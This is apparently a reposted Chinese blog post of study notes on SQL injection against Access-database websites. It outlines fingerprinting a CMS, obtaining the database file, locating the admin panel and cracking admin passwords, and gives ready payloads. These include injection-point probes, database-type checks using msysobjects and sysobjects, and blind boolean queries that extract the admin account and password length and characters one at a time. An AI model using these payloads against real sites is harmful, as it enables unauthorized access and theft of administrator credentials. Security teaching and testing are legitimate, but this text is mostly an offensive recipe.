cracer-Access注入

步骤:

1.判断网站CMS类型

2.网站暴库漏洞


3.网站后台查找


4.网站管理员密码猜解

5.网站漏洞的利用


********************************

1.判断网站CMS类型:    


使用工具:

1.wvs 

2.wwwscan  

3.站长工具  (tool.chinaz.com)

4.whatweb  5

.googlehack     

判断目标:

1.脚本语言(asp,php... ...)

2.操作系统

3.搭建平台


4.cms厂商

暴库(个人理解):通过非法途径得到网站数据库,进行提权等操作。

数据库文件后缀名"XXX.mdb",网站数据库目录中若有'#',可将其转码为'%23'。

获得数据库文件之后运用破障软件得到登陆用户名和密码(md5解密)

判断注入点:

'

and 1=1

and 1=2

or 1=1

or 1=2

and 1=23

手工注入:

判断数据库类型:

and exists (select * from msysobjects)>0          access

and exists (select * from sysobjects)>0             sqlserver

判断数据库表

and exists (select * from admin)    

判断账户密码长度

and (select len(admin) from admin)=5      如果返回正常说明管理员账户长度为5

and (select len(passworf) from admin)=5  猜解管理密码长度是否为5,输入大于小于符号判断长度区间 

通过ascii码来判断管理员账号的第一个数据

and (select top 1 asc(mid(admin,1,1))from admin)>100 返回正常说明大于,不正常说明不大于    


猜你喜欢

转载自blog.csdn.net/charlesgodx/article/details/80757059